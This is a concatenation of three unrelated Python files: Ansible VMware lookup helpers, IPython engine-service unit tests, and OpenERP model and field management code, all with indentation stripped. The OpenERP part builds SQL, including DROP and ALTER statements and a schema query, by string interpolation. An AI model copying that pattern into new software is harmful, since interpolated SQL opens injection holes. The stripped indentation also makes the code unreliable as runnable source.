user_desired_path = "%s%s%s" % (dcpath, user_defined_dc, user_folder)
else:
# User defined datacenter is not nested i.e. dcpath = '/' , or
# User defined datacenter is nested i.e. dcpath = '/F0/DC0' or
# User provided folder starts with / and datacenter i.e. folder = /ha-datacenter/ or
# User defined folder starts with datacenter without '/' i.e.
# folder = DC0/vm/india/finance or
# folder = DC0/vm
user_desired_path = user_folder
for vm in vms:
# Check if user has provided same path as virtual machine
actual_vm_folder_path = self.get_vm_path(content=self.content, vm_name=vm)
if not actual_vm_folder_path.startswith("%s%s" % (dcpath, user_defined_dc)):
continue
if user_desired_path in actual_vm_folder_path:
vm_obj = vm
break
elif vms:
# Unique virtual machine found.
vm_obj = vms[0]
if vm_obj:
self.current_vm_obj = vm_obj
return vm_obj
def gather_facts(self, vm):
"""
Function to gather facts of virtual machine.
Args:
vm: Name of virtual machine.
Returns: Facts dictionary of the given virtual machine.
"""
return gather_vm_facts(self.content, vm)
@staticmethod
def get_vm_path(content, vm_name):
"""
Function to find the path of virtual machine.
Args:
content: VMware content object
vm_name: virtual machine managed object
Returns: Folder of virtual machine if exists, else None
"""
folder_name = None
folder = vm_name.parent
if folder:
folder_name = folder.name
fp = folder.parent
# climb back up the tree to find our path, stop before the root folder
while fp is not None and fp.name is not None and fp != content.rootFolder:
folder_name = fp.name + '/' + folder_name
try:
fp = fp.parent
except Exception:
break
folder_name = '/' + folder_name
return folder_name
def get_vm_or_template(self, template_name=None):
"""
Find the virtual machine or virtual machine template using name
used for cloning purpose.
Args:
template_name: Name of virtual machine or virtual machine template
Returns: virtual machine or virtual machine template object
"""
template_obj = None
if not template_name:
return template_obj
if "/" in template_name:
vm_obj_path = os.path.dirname(template_name)
vm_obj_name = os.path.basename(template_name)
template_obj = find_vm_by_id(self.content, vm_obj_name, vm_id_type="inventory_path", folder=vm_obj_path)
if template_obj:
return template_obj
else:
template_obj = find_vm_by_id(self.content, vm_id=template_name, vm_id_type="uuid")
if template_obj:
return template_obj
objects = self.get_managed_objects_properties(vim_type=vim.VirtualMachine, properties=['name'])
templates = []
for temp_vm_object in objects:
if len(temp_vm_object.propSet) != 1:
continue
for temp_vm_object_property in temp_vm_object.propSet:
if temp_vm_object_property.val == template_name:
templates.append(temp_vm_object.obj)
break
if len(templates) > 1:
# We have found multiple virtual machine templates
self.module.fail_json(msg="Multiple virtual machines or templates with same name [%s] found." % template_name)
elif templates:
template_obj = templates[0]
return template_obj
# Cluster related functions
def find_cluster_by_name(self, cluster_name, datacenter_name=None):
"""
Find Cluster by name in given datacenter
Args:
cluster_name: Name of cluster name to find
datacenter_name: (optional) Name of datacenter
Returns: Cluster managed object if found, else None
"""
return find_cluster_by_name(self.content, cluster_name, datacenter=datacenter_name)
def get_all_hosts_by_cluster(self, cluster_name):
"""
Get all hosts from cluster by cluster name
Args:
cluster_name: Name of cluster
Returns: List of hosts
"""
cluster_obj = self.find_cluster_by_name(cluster_name=cluster_name)
if cluster_obj:
return [host for host in cluster_obj.host]
else:
return []
# Hosts related functions
def find_hostsystem_by_name(self, host_name):
"""
Find Host by name
Args:
host_name: Name of ESXi host
Returns: Host system managed object if found, else None
"""
return find_hostsystem_by_name(self.content, hostname=host_name)
def get_all_host_objs(self, cluster_name=None, esxi_host_name=None):
"""
Function to get all host system managed object
Args:
cluster_name: Name of Cluster
esxi_host_name: Name of ESXi server
Returns: A list of all host system managed objects, else empty list
"""
host_obj_list = []
if not self.is_vcenter():
hosts = get_all_objs(self.content, [vim.HostSystem]).keys()
if hosts:
host_obj_list.append(list(hosts)[0])
else:
if cluster_name:
cluster_obj = self.find_cluster_by_name(cluster_name=cluster_name)
if cluster_obj:
host_obj_list = [host for host in cluster_obj.host]
else:
self.module.fail_json(changed=False, msg="Cluster '%s' not found" % cluster_name)
elif esxi_host_name:
if isinstance(esxi_host_name, str):
esxi_host_name = [esxi_host_name]
for host in esxi_host_name:
esxi_host_obj = self.find_hostsystem_by_name(host_name=host)
if esxi_host_obj:
host_obj_list = [esxi_host_obj]
else:
self.module.fail_json(changed=False, msg="ESXi '%s' not found" % host)
return host_obj_list
# Network related functions
@staticmethod
def find_host_portgroup_by_name(host, portgroup_name):
"""
Find Portgroup on given host
Args:
host: Host config object
portgroup_name: Name of portgroup
Returns: Portgroup object if found, else False
"""
for portgroup in host.config.network.portgroup:
if portgroup.spec.name == portgroup_name:
return portgroup
return False
def get_all_port_groups_by_host(self, host_system):
"""
Function to get all Port Group by host
Args:
host_system: Name of Host System
Returns: List of Port Group Spec
"""
pgs_list = []
for pg in host_system.config.network.portgroup:
pgs_list.append(pg)
return pgs_list
# Datacenter
def find_datacenter_by_name(self, datacenter_name):
"""
Function to get datacenter managed object by name
Args:
datacenter_name: Name of datacenter
Returns: datacenter managed object if found else None
"""
return find_datacenter_by_name(self.content, datacenter_name=datacenter_name)
def find_datastore_by_name(self, datastore_name):
"""
Function to get datastore managed object by name
Args:
datastore_name: Name of datastore
Returns: datastore managed object if found else None
"""
return find_datastore_by_name(self.content, datastore_name=datastore_name)
# Datastore cluster
def find_datastore_cluster_by_name(self, datastore_cluster_name):
"""
Function to get datastore cluster managed object by name
Args:
datastore_cluster_name: Name of datastore cluster
Returns: Datastore cluster managed object if found else None
"""
data_store_clusters = get_all_objs(self.content, [vim.StoragePod])
for dsc in data_store_clusters:
if dsc.name == datastore_cluster_name:
return dsc
return None
# VMDK stuff
def vmdk_disk_path_split(self, vmdk_path):
"""
Takes a string in the format
[datastore_name] path/to/vm_name.vmdk
Returns a tuple with multiple strings:
1. datastore_name: The name of the datastore (without brackets)
2. vmdk_fullpath: The "path/to/vm_name.vmdk" portion
3. vmdk_filename: The "vm_name.vmdk" portion of the string (os.path.basename equivalent)
4. vmdk_folder: The "path/to/" portion of the string (os.path.dirname equivalent)
"""
try:
datastore_name = re.match(r'^\[(.*?)\]', vmdk_path, re.DOTALL).groups()[0]
vmdk_fullpath = re.match(r'\[.*?\] (.*)$', vmdk_path).groups()[0]
vmdk_filename = os.path.basename(vmdk_fullpath)
vmdk_folder = os.path.dirname(vmdk_fullpath)
return datastore_name, vmdk_fullpath, vmdk_filename, vmdk_folder
except (IndexError, AttributeError) as e:
self.module.fail_json(msg="Bad path '%s' for filename disk vmdk image: %s" % (vmdk_path, to_native(e)))
def find_vmdk_file(self, datastore_obj, vmdk_fullpath, vmdk_filename, vmdk_folder):
"""
Return vSphere file object or fail_json
Args:
datastore_obj: Managed object of datastore
vmdk_fullpath: Path of VMDK file e.g., path/to/vm/vmdk_filename.vmdk
vmdk_filename: Name of vmdk e.g., VM0001_1.vmdk
vmdk_folder: Base dir of VMDK e.g, path/to/vm
"""
browser = datastore_obj.browser
datastore_name = datastore_obj.name
datastore_name_sq = "[" + datastore_name + "]"
if browser is None:
self.module.fail_json(msg="Unable to access browser for datastore %s" % datastore_name)
detail_query = vim.host.DatastoreBrowser.FileInfo.Details(
fileOwner=True,
fileSize=True,
fileType=True,
modification=True
)
search_spec = vim.host.DatastoreBrowser.SearchSpec(
details=detail_query,
matchPattern=[vmdk_filename],
searchCaseInsensitive=True,
)
search_res = browser.SearchSubFolders(
datastorePath=datastore_name_sq,
searchSpec=search_spec
)
changed = False
vmdk_path = datastore_name_sq + " " + vmdk_fullpath
try:
changed, result = wait_for_task(search_res)
except TaskError as task_e:
self.module.fail_json(msg=to_native(task_e))
if not changed:
self.module.fail_json(msg="No valid disk vmdk image found for path %s" % vmdk_path)
target_folder_path = datastore_name_sq + " " + vmdk_folder + '/'
for file_result in search_res.info.result:
for f in getattr(file_result, 'file'):
if f.path == vmdk_filename and file_result.folderPath == target_folder_path:
return f
self.module.fail_json(msg="No vmdk file found for path specified [%s]" % vmdk_path)
|
"""This file contains unittests for the kernel.engineservice.py module.
Things that should be tested:
- Should the EngineService return Deferred objects?
- Run the same tests that are run in shell.py.
- Make sure that the Interface is really implemented.
- The startService and stopService methods.
"""
__docformat__ = "restructuredtext en"
__test__ = {}
from twisted.internet import defer
from twisted.application.service import IService
from IPython.kernel import engineservice as es
from IPython.testing.util import DeferredTestCase
from IPython.kernel.tests.engineservicetest import \
IEngineCoreTestCase, \
IEngineSerializedTestCase, \
IEngineQueuedTestCase, \
IEnginePropertiesTestCase
class BasicEngineServiceTest(DeferredTestCase,
IEngineCoreTestCase,
IEngineSerializedTestCase,
IEnginePropertiesTestCase):
def setUp(self):
self.engine = es.EngineService()
self.engine.startService()
def tearDown(self):
return self.engine.stopService()
class ThreadedEngineServiceTest(DeferredTestCase,
IEngineCoreTestCase,
IEngineSerializedTestCase,
IEnginePropertiesTestCase):
def setUp(self):
self.engine = es.ThreadedEngineService()
self.engine.startService()
def tearDown(self):
return self.engine.stopService()
class QueuedEngineServiceTest(DeferredTestCase,
IEngineCoreTestCase,
IEngineSerializedTestCase,
IEnginePropertiesTestCase,
IEngineQueuedTestCase):
def setUp(self):
self.rawEngine = es.EngineService()
self.rawEngine.startService()
self.engine = es.IEngineQueued(self.rawEngine)
def tearDown(self):
return self.rawEngine.stopService()
|
from collections import defaultdict
import logging
import re
import time
import types
import openerp
from openerp import SUPERUSER_ID
from openerp import models, tools, api
from openerp.modules.registry import RegistryManager
from openerp.osv import fields, osv
from openerp.osv.orm import BaseModel, Model, MAGIC_COLUMNS, except_orm
from openerp.tools import config
from openerp.tools.safe_eval import safe_eval as eval
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
MODULE_UNINSTALL_FLAG = '_force_unlink'
def _get_fields_type(self, cr, uid, context=None):
# Avoid too many nested `if`s below, as RedHat's Python 2.6
# breaks on it. See bug 939653.
return sorted([(k,k) for k,v in fields.__dict__.iteritems()
if type(v) == types.TypeType and \
issubclass(v, fields._column) and \
v != fields._column and \
not v._deprecated and \
not issubclass(v, fields.function)])
def _in_modules(self, cr, uid, ids, field_name, arg, context=None):
#pseudo-method used by fields.function in ir.model/ir.model.fields
module_pool = self.pool["ir.module.module"]
installed_module_ids = module_pool.search(cr, uid, [('state','=','installed')])
installed_module_names = module_pool.read(cr, uid, installed_module_ids, ['name'], context=context)
installed_modules = set(x['name'] for x in installed_module_names)
result = {}
xml_ids = osv.osv._get_xml_ids(self, cr, uid, ids)
for k,v in xml_ids.iteritems():
result[k] = ', '.join(sorted(installed_modules & set(xml_id.split('.')[0] for xml_id in v)))
return result
class unknown(models.AbstractModel):
"""
Abstract model used as a substitute for relational fields with an unknown
comodel.
"""
_name = '_unknown'
class ir_model(osv.osv):
_name = 'ir.model'
_description = "Models"
_order = 'model'
def _is_osv_memory(self, cr, uid, ids, field_name, arg, context=None):
models = self.browse(cr, uid, ids, context=context)
res = dict.fromkeys(ids)
for model in models:
if model.model in self.pool:
res[model.id] = self.pool[model.model].is_transient()
else:
_logger.error('Missing model %s' % (model.model, ))
return res
def _search_osv_memory(self, cr, uid, model, name, domain, context=None):
if not domain:
return []
__, operator, value = domain[0]
if operator not in ['=', '!=']:
raise osv.except_osv(_("Invalid Search Criteria"), _('The osv_memory field can only be compared with the = and != operators.'))
value = bool(value) if operator == '=' else not bool(value)
all_model_ids = self.search(cr, uid, [], context=context)
is_osv_mem = self._is_osv_memory(cr, uid, all_model_ids, 'osv_memory', arg=None, context=context)
return [('id', 'in', [id for id in is_osv_mem if bool(is_osv_mem[id]) == value])]
def _view_ids(self, cr, uid, ids, field_name, arg, context=None):
models = self.browse(cr, uid, ids)
res = {}
for model in models:
res[model.id] = self.pool["ir.ui.view"].search(cr, uid, [('model', '=', model.model)])
return res
def _inherited_models(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for model in self.browse(cr, uid, ids, context=context):
res[model.id] = []
inherited_models = [model_name for model_name in self.pool[model.model]._inherits]
if inherited_models:
res[model.id] = self.search(cr, uid, [('model', 'in', inherited_models)], context=context)
return res
_columns = {
'name': fields.char('Model Description', translate=True, required=True),
'model': fields.char('Model', required=True, select=1),
'info': fields.text('Information'),
'field_id': fields.one2many('ir.model.fields', 'model_id', 'Fields', required=True, copy=True),
'inherited_model_ids': fields.function(_inherited_models, type="many2many", obj="ir.model", string="Inherited models",
help="The list of models that extends the current model."),
'state': fields.selection([('manual','Custom Object'),('base','Base Object')],'Type', readonly=True),
'access_ids': fields.one2many('ir.model.access', 'model_id', 'Access'),
'osv_memory': fields.function(_is_osv_memory, string='Transient Model', type='boolean',
fnct_search=_search_osv_memory,
help="This field specifies whether the model is transient or not (i.e. if records are automatically deleted from the database or not)"),
'modules': fields.function(_in_modules, type='char', string='In Modules', help='List of modules in which the object is defined or inherited'),
'view_ids': fields.function(_view_ids, type='one2many', obj='ir.ui.view', string='Views'),
}
_defaults = {
'model': 'x_',
'state': 'manual',
}
def _check_model_name(self, cr, uid, ids, context=None):
for model in self.browse(cr, uid, ids, context=context):
if model.state=='manual':
if not model.model.startswith('x_'):
return False
if not re.match('^[a-z_A-Z0-9.]+$',model.model):
return False
return True
def _model_name_msg(self, cr, uid, ids, context=None):
return _('The Object name must start with x_ and must not contain any special characters!')
_constraints = [
(_check_model_name, _model_name_msg, ['model']),
]
_sql_constraints = [
('obj_name_uniq', 'unique (model)', 'Each model must be unique!'),
]
# overridden to allow searching both on model name (model field)
# and model description (name field)
def _name_search(self, cr, uid, name='', args=None, operator='ilike', context=None, limit=100, name_get_uid=None):
if args is None:
args = []
domain = args + ['|', ('model', operator, name), ('name', operator, name)]
return self.name_get(cr, name_get_uid or uid,
super(ir_model, self).search(cr, uid, domain, limit=limit, context=context),
context=context)
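# e.g. searching "partner" from the UI matches both records whose technical
# name (model) contains "partner" and those whose description (name) does.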
def _drop_table(self, cr, uid, ids, context=None):
for model in self.browse(cr, uid, ids, context):
model_pool = self.pool[model.model]
cr.execute('select relkind from pg_class where relname=%s', (model_pool._table,))
result = cr.fetchone()
if result and result[0] == 'v':
cr.execute('DROP view %s' % (model_pool._table,))
elif result and result[0] == 'r':
cr.execute('DROP TABLE %s CASCADE' % (model_pool._table,))
return True
def unlink(self, cr, user, ids, context=None):
# Prevent manual deletion of module tables
if context is None: context = {}
if isinstance(ids, (int, long)):
ids = [ids]
if not context.get(MODULE_UNINSTALL_FLAG):
for model in self.browse(cr, user, ids, context):
if model.state != 'manual':
raise except_orm(_('Error'), _("Model '%s' contains module data and cannot be removed!") % (model.name,))
self._drop_table(cr, user, ids, context)
res = super(ir_model, self).unlink(cr, user, ids, context)
if not context.get(MODULE_UNINSTALL_FLAG):
# only reload pool for normal unlink. For module uninstall the
# reload is done independently in openerp.modules.loading
cr.commit() # must be committed before reloading registry in new cursor
api.Environment.reset()
RegistryManager.new(cr.dbname)
RegistryManager.signal_registry_change(cr.dbname)
return res
def write(self, cr, user, ids, vals, context=None):
if context:
context = dict(context)
context.pop('__last_update', None)
# Filter out link operations (4) on field_id, because openerp-web
# always writes (4, id, False) even for non-dirty items
if 'field_id' in vals:
vals['field_id'] = [op for op in vals['field_id'] if op[0] != 4]
return super(ir_model,self).write(cr, user, ids, vals, context)
def create(self, cr, user, vals, context=None):
if context is None:
context = {}
res = super(ir_model,self).create(cr, user, vals, context)
if vals.get('state','manual')=='manual':
# add model in registry
self.instanciate(cr, user, vals['model'], context)
self.pool.setup_models(cr, partial=(not self.pool.ready))
# update database schema
model = self.pool[vals['model']]
ctx = dict(context,
field_name=vals['name'],
field_state='manual',
select=vals.get('select_level', '0'),
update_custom_fields=True)
model._auto_init(cr, ctx)
model._auto_end(cr, ctx) # actually create FKs!
RegistryManager.signal_registry_change(cr.dbname)
return res
def instanciate(self, cr, user, model, context=None):
if isinstance(model, unicode):
model = model.encode('utf-8')
class CustomModel(models.Model):
_name = model
_module = False
_custom = True
CustomModel._build_model(self.pool, cr)
class ir_model_fields(osv.osv):
_name = 'ir.model.fields'
_description = "Fields"
_rec_name = 'field_description'
_columns = {
'name': fields.char('Name', required=True, select=1),
'complete_name': fields.char('Complete Name', select=1),
'model': fields.char('Object Name', required=True, select=1,
help="The technical name of the model this field belongs to"),
'relation': fields.char('Object Relation',
help="For relationship fields, the technical name of the target model"),
'relation_field': fields.char('Relation Field',
help="For one2many fields, the field on the target model that implement the opposite many2one relationship"),
'model_id': fields.many2one('ir.model', 'Model', required=True, select=True, ondelete='cascade',
help="The model this field belongs to"),
'field_description': fields.char('Field Label', required=True),
'ttype': fields.selection(_get_fields_type, 'Field Type', required=True),
'selection': fields.char('Selection Options', help="List of options for a selection field, "
"specified as a Python expression defining a list of (key, label) pairs. "
"For example: [('blue','Blue'),('yellow','Yellow')]"),
'required': fields.boolean('Required'),
'readonly': fields.boolean('Readonly'),
'select_level': fields.selection([('0','Not Searchable'),('1','Always Searchable'),('2','Advanced Search (deprecated)')],'Searchable', required=True),
'translate': fields.boolean('Translatable', help="Whether values for this field can be translated (enables the translation mechanism for that field)"),
'size': fields.integer('Size'),
'state': fields.selection([('manual','Custom Field'),('base','Base Field')],'Type', required=True, readonly=True, select=1),
'on_delete': fields.selection([('cascade', 'Cascade'), ('set null', 'Set NULL'), ('restrict', 'Restrict')],
'On Delete', help='On delete property for many2one fields'),
'domain': fields.char('Domain', help="The optional domain to restrict possible values for relationship fields, "
"specified as a Python expression defining a list of triplets. "
"For example: [('color','=','red')]"),
'groups': fields.many2many('res.groups', 'ir_model_fields_group_rel', 'field_id', 'group_id', 'Groups'),
'selectable': fields.boolean('Selectable'),
'modules': fields.function(_in_modules, type='char', string='In Modules', help='List of modules in which the field is defined'),
'serialization_field_id': fields.many2one('ir.model.fields', 'Serialization Field', domain = "[('ttype','=','serialized')]",
ondelete='cascade', help="If set, this field will be stored in the sparse "
"structure of the serialization field, instead "
"of having its own database column. This cannot be "
"changed after creation."),
}
_defaults = {
'selection': "",
'domain': "[]",
'name': 'x_',
'state': 'manual',
'on_delete': 'set null',
'select_level': '0',
'field_description': '',
'selectable': 1,
}
_order = "name"
def _check_selection(self, cr, uid, selection, context=None):
try:
selection_list = eval(selection)
except Exception:
_logger.warning('Invalid selection list definition for fields.selection', exc_info=True)
raise except_orm(_('Error'),
_("The Selection Options expression is not a valid Pythonic expression."
"Please provide an expression in the [('key','Label'), ...] format."))
check = True
if not (isinstance(selection_list, list) and selection_list):
check = False
else:
for item in selection_list:
if not (isinstance(item, (tuple,list)) and len(item) == 2):
check = False
break
if not check:
raise except_orm(_('Error'),
_("The Selection Options expression is must be in the [('key','Label'), ...] format!"))
return True
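# A valid selection definition, per the `selection` field help text above:
#   "[('blue','Blue'),('yellow','Yellow')]"
# i.e. a Python list literal of (key, label) pairs.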
def _size_gt_zero_msg(self, cr, user, ids, context=None):
return _('Size of the field can never be less than 0!')
_sql_constraints = [
('size_gt_zero', 'CHECK (size>=0)',_size_gt_zero_msg ),
]
def _drop_column(self, cr, uid, ids, context=None):
for field in self.browse(cr, uid, ids, context):
if field.name in MAGIC_COLUMNS:
continue
model = self.pool[field.model]
cr.execute('select relkind from pg_class where relname=%s', (model._table,))
result = cr.fetchone()
cr.execute("SELECT column_name FROM information_schema.columns WHERE table_name ='%s' and column_name='%s'" %(model._table, field.name))
column_name = cr.fetchone()
if column_name and (result and result[0] == 'r'):
cr.execute('ALTER table "%s" DROP column "%s" cascade' % (model._table, field.name))
# remove m2m relation table for custom fields
# we consider the m2m relation is only one way as it's not possible
# to specify the relation table in the interface for custom fields
# TODO master: maybe use ir.model.relations for custom fields
if field.state == 'manual' and field.ttype == 'many2many':
rel_name = model._fields[field.name].relation
cr.execute('DROP table "%s"' % (rel_name))
model._pop_field(field.name)
return True
def unlink(self, cr, user, ids, context=None):
# Prevent manual deletion of module columns
if context is None: context = {}
if isinstance(ids, (int, long)):
ids = [ids]
if not context.get(MODULE_UNINSTALL_FLAG) and \
any(field.state != 'manual' for field in self.browse(cr, user, ids, context)):
raise except_orm(_('Error'), _("This column contains module data and cannot be removed!"))
self._drop_column(cr, user, ids, context)
res = super(ir_model_fields, self).unlink(cr, user, ids, context)
if not context.get(MODULE_UNINSTALL_FLAG):
# The field we just deleted might have been inherited, and the registry is
# inconsistent in this case; therefore we reload the registry.
cr.commit()
api.Environment.reset()
RegistryManager.new(cr.dbname)
RegistryManager.signal_registry_change(cr.dbname)
return res
def create(self, cr, user, vals, context=None):
if 'model_id' in vals:
model_data = self.pool['ir.model'].browse(cr, user, vals['model_id'])
vals['model'] = model_data.model
if context is None:
context = {}
if vals.get('ttype', False) == 'selection':
if not vals.get('selection',False):
raise except_orm(_('Error'), _('For selection fields, the Selection Options must be given!'))
self._check_selection(cr, user, vals['selection'], context=context)
res = super(ir_model_fields,self).create(cr, user, vals, context)
if vals.get('state','manual') == 'manual':
if not vals['name'].startswith('x_'):
raise except_orm(_('Error'), _("Custom fields must have a name that starts with 'x_' !"))
if vals.get('relation',False) and not self.pool['ir.model'].search(cr, user, [('model','=',vals['relation'])]):
raise except_orm(_('Error'), _("Model %s does not exist!") % vals['relation'])
self.pool.clear_manual_fields()
if vals['model'] in self.pool:
model = self.pool[vals['model']]
if vals['model'].startswith('x_') and vals['name'] == 'x_name':
model._rec_name = 'x_name'
# re-initialize model in registry
model.__init__(self.pool, cr)
self.pool.setup_models(cr, partial=(not self.pool.ready))
# update database schema
model = self.pool[vals['model']]
ctx = dict(context,
field_name=vals['name'],
field_state='manual',
select=vals.get('select_level', '0'),
update_custom_fields=True)
model._auto_init(cr, ctx)
model._auto_end(cr, ctx) # actually create FKs!
RegistryManager.signal_registry_change(cr.dbname)
return res
def write(self, cr, user, ids, vals, context=None):
if context is None:
context = {}
# For now, renaming a sparse field or changing its storage system is not allowed; this may be supported later.
if 'serialization_field_id' in vals or 'name' in vals:
for field in self.browse(cr, user, ids, context=context):
if 'serialization_field_id' in vals and field.serialization_field_id.id != vals['serialization_field_id']:
raise except_orm(_('Error!'), _('Changing the storing system for field "%s" is not allowed.')%field.name)
if field.serialization_field_id and (field.name != vals['name']):
raise except_orm(_('Error!'), _('Renaming sparse field "%s" is not allowed')%field.name)
# if set, *one* column can be renamed here
column_rename = None
# names of the models to patch
patched_models = set()
if vals and ids:
checked_selection = False # need only check it once, so defer
for item in self.browse(cr, user, ids, context=context):
obj = self.pool.get(item.model)
field = getattr(obj, '_fields', {}).get(item.name)
if item.state != 'manual':
raise except_orm(_('Error!'),
_('Properties of base fields cannot be altered in this manner! '
'Please modify them through Python code, '
'preferably through a custom addon!'))
if item.ttype == 'selection' and 'selection' in vals \
and not checked_selection:
self._check_selection(cr, user, vals['selection'], context=context)
checked_selection = True
final_name = item.name
if 'name' in vals and vals['name'] != item.name:
# We need to rename the column
if column_rename:
raise except_orm(_('Error!'), _('Can only rename one column at a time!'))
if vals['name'] in obj._columns:
raise except_orm(_('Error!'), _('Cannot rename column to %s, because that column already exists!') % vals['name'])
if vals.get('state', 'manual') == 'manual' and not vals['name'].startswith('x_'):
raise except_orm(_('Error!'), _('New column name must still start with x_, because it is a custom field!'))
if '\'' in vals['name'] or '"' in vals['name'] or ';' in vals['name']:
raise ValueError('Invalid character in column name')
column_rename = (obj, (obj._table, item.name, vals['name']))
final_name = vals['name']
if 'model_id' in vals and vals['model_id'] != item.model_id.id:
raise except_orm(_("Error!"), _("Changing the model of a field is forbidden!"))
if 'ttype' in vals and vals['ttype'] != item.ttype:
raise except_orm(_("Error!"), _("Changing the type of a column is not yet supported. "
"Please drop it and create it again!"))
# We don't check the 'state', because it might come from the context
# (thus be set for multiple fields) and will be ignored anyway.
if obj is not None and field is not None:
patched_models.add(obj._name)
# These shall never be written (modified)
for column_name in ('model_id', 'model', 'state'):
if column_name in vals:
del vals[column_name]
res = super(ir_model_fields,self).write(cr, user, ids, vals, context=context)
self.pool.clear_manual_fields()
if column_rename:
obj, rename = column_rename
cr.execute('ALTER TABLE "%s" RENAME COLUMN "%s" TO "%s"' % rename)
if column_rename or patched_models:
# setup models, this will reload all manual fields in registry
self.pool.setup_models(cr, partial=(not self.pool.ready))
if patched_models:
# We have to update _columns of the model(s) and then call their
# _auto_init to sync the db with the model. Hopefully, since write()
# was called earlier, they will be in-sync before the _auto_init.
# Anything we don't update in _columns now will be reset from
# the model into ir.model.fields (db).
ctx = dict(context,
select=vals.get('select_level', '0'),
update_custom_fields=True,
)
for model_name in patched_models:
obj = self.pool[model_name]
obj._auto_init(cr, ctx)
obj._auto_end(cr, ctx) # actually create FKs!
if column_rename or patched_models:
RegistryManager.signal_registry_change(cr.dbname)
return res
class ir_model_constraint(Model):
"""
This model tracks PostgreSQL foreign keys and constraints used by OpenERP
models.
"""
_name = 'ir.model.constraint'
_columns = {
'name': fields.char('Constraint', required=True, select=1,
help="PostgreSQL constraint or foreign key name."),
'model': fields.many2one('ir.model', string='Model',
required=True, select=1),
'module': fields.many2one('ir.module.module', string='Module',
required=True, select=1),
'type': fields.char('Constraint Type', required=True, size=1, select=1,
help="Type of the constraint: `f` for a foreign key, "
"`u` for other constraints."),
'date_update': fields.datetime('Update Date'),
'date_init': fields.datetime('Initialization Date')
}
_sql_constraints = [
('module_name_uniq', 'unique(name, module)',
'Constraints with the same name are unique per module.'),
]
def _module_data_uninstall(self, cr, uid, ids, context=None):
"""
Delete PostgreSQL foreign keys and constraints tracked by this model.
"""
if uid != SUPERUSER_ID and not self.pool['ir.model.access'].check_groups(cr, uid, "base.group_system"):
raise except_orm(_('Permission Denied'), (_('Administrator access is required to uninstall a module')))
context = dict(context or {})
ids_set = set(ids)
ids.sort()
ids.reverse()
for data in self.browse(cr, uid, ids, context):
model = data.model.model
model_obj = self.pool[model]
name = openerp.tools.ustr(data.name)
typ = data.type
# double-check we are really going to delete all the owners of this schema element
cr.execute("""SELECT id from ir_model_constraint where name=%s""", (data.name,))
external_ids = [x[0] for x in cr.fetchall()]
if set(external_ids)-ids_set:
# as installed modules have defined this element we must not delete it!
continue
if typ == 'f':
# test if FK exists on this table (it could be on a related m2m table, in which case we ignore it)
cr.execute("""SELECT 1 from pg_constraint cs JOIN pg_class cl ON (cs.conrelid = cl.oid)
WHERE cs.contype=%s and cs.conname=%s and cl.relname=%s""", ('f', name, model_obj._table))
if cr.fetchone():
cr.execute('ALTER TABLE "%s" DROP CONSTRAINT "%s"' % (model_obj._table, name),)
_logger.info('Dropped FK CONSTRAINT %s@%s', name, model)
if typ == 'u':
# test if constraint exists
cr.execute("""SELECT 1 from pg_constraint cs JOIN pg_class cl ON (cs.conrelid = cl.oid)
WHERE cs.contype=%s and cs.conname=%s and cl.relname=%s""", ('u', name, model_obj._table))
if cr.fetchone():
cr.execute('ALTER TABLE "%s" DROP CONSTRAINT "%s"' % (model_obj._table, name),)
_logger.info('Dropped CONSTRAINT %s@%s', name, model)
self.unlink(cr, uid, ids, context)
class ir_model_relation(Model):
"""
This model tracks PostgreSQL tables used to implement OpenERP many2many
relations.
"""
_name = 'ir.model.relation'
_columns = {
'name': fields.char('Relation Name', required=True, select=1,
help="PostgreSQL table name implementing a many2many relation."),
'model': fields.many2one('ir.model', string='Model',
required=True, select=1),
'module': fields.many2one('ir.module.module', string='Module',
required=True, select=1),
'date_update': fields.datetime('Update Date'),
'date_init': fields.datetime('Initialization Date')
}
def _module_data_uninstall(self, cr, uid, ids, context=None):
"""
Delete PostgreSQL many2many relations tracked by this model.
"""
if uid != SUPERUSER_ID and not self.pool['ir.model.access'].check_groups(cr, uid, "base.group_system"):
raise except_orm(_('Permission Denied'), (_('Administrator access is required to uninstall a module')))
ids_set = set(ids)
to_drop_table = []
ids.sort()
ids.reverse()
for data in self.browse(cr, uid, ids, context):
model = data.model
name = openerp.tools.ustr(data.name)
# double-check we are really going to delete all the owners of this schema element
cr.execute("""SELECT id from ir_model_relation where name = %s""", (data.name,))
external_ids = [x[0] for x in cr.fetchall()]
if set(external_ids)-ids_set:
# as installed modules have defined this element we must not delete it!
continue
cr.execute("SELECT 1 FROM information_schema.tables WHERE table_name=%s", (name,))
            if cr.fetchone() and name not in to_drop_table:
to_drop_table.append(name)
self.unlink(cr, uid, ids, context)
# drop m2m relation tables
for table in to_drop_table:
            cr.execute('DROP TABLE %s CASCADE' % table)
_logger.info('Dropped table %s', table)
cr.commit()
class ir_model_access(osv.osv):
_name = 'ir.model.access'
_columns = {
'name': fields.char('Name', required=True, select=True),
        'active': fields.boolean('Active', help='If you uncheck the active field, it will disable the ACL without deleting it (if you delete a native ACL, it will be re-created when you reload the module).'),
'model_id': fields.many2one('ir.model', 'Object', required=True, domain=[('osv_memory','=', False)], select=True, ondelete='cascade'),
'group_id': fields.many2one('res.groups', 'Group', ondelete='cascade', select=True),
'perm_read': fields.boolean('Read Access'),
'perm_write': fields.boolean('Write Access'),
'perm_create': fields.boolean('Create Access'),
'perm_unlink': fields.boolean('Delete Access'),
}
_defaults = {
'active': True,
}
    def check_groups(self, cr, uid, group):
        grouparr = group.split('.')
        if len(grouparr) != 2:
            # the expected format is "module.xml_id", e.g. "base.group_system"
            return False
        cr.execute("select 1 from res_groups_users_rel where uid=%s and gid IN (select res_id from ir_model_data where module=%s and name=%s)", (uid, grouparr[0], grouparr[1],))
        return bool(cr.fetchone())
def check_group(self, cr, uid, model, mode, group_ids):
""" Check if a specific group has the access mode to the specified model"""
assert mode in ['read','write','create','unlink'], 'Invalid access mode'
if isinstance(model, BaseModel):
assert model._name == 'ir.model', 'Invalid model object'
            model_name = model.model  # 'model' holds the technical name; 'name' is the human-readable label
else:
model_name = model
if isinstance(group_ids, (int, long)):
group_ids = [group_ids]
for group_id in group_ids:
cr.execute("SELECT perm_" + mode + " "
" FROM ir_model_access a "
" JOIN ir_model m ON (m.id = a.model_id) "
" WHERE m.model = %s AND a.active IS True "
" AND a.group_id = %s", (model_name, group_id)
)
r = cr.fetchone()
if r is None:
cr.execute("SELECT perm_" + mode + " "
" FROM ir_model_access a "
" JOIN ir_model m ON (m.id = a.model_id) "
" WHERE m.model = %s AND a.active IS True "
" AND a.group_id IS NULL", (model_name, )
)
r = cr.fetchone()
